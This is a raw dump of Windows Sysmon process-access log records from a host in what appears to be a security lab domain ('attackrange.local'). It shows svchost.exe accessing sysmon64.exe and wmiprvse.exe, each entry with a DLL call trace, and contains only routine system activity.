13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.962{08A6967A-4288-6000-1000-000000009A01}11362480C:\Windows\system32\svchost.exe{08A6967A-4299-6000-4A00-000000009A01}3740C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wmiprvsd.dll+fa1f|C:\Windows\system32\wbem\wmiprvsd.dll+1351d|C:\Windows\system32\wbem\wmiprvsd.dll+127f4|C:\Windows\system32\wbem\wbemcore.dll+ced2|C:\Windows\system32\wbem\wbemcore.dll+d531|C:\Windows\system32\wbem\wbemcore.dll+104fe|C:\Windows\system32\wbem\wbemcore.dll+25435|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c 10341000x80000000000000001729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4299-6000-4A00-000000009A01}3740C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 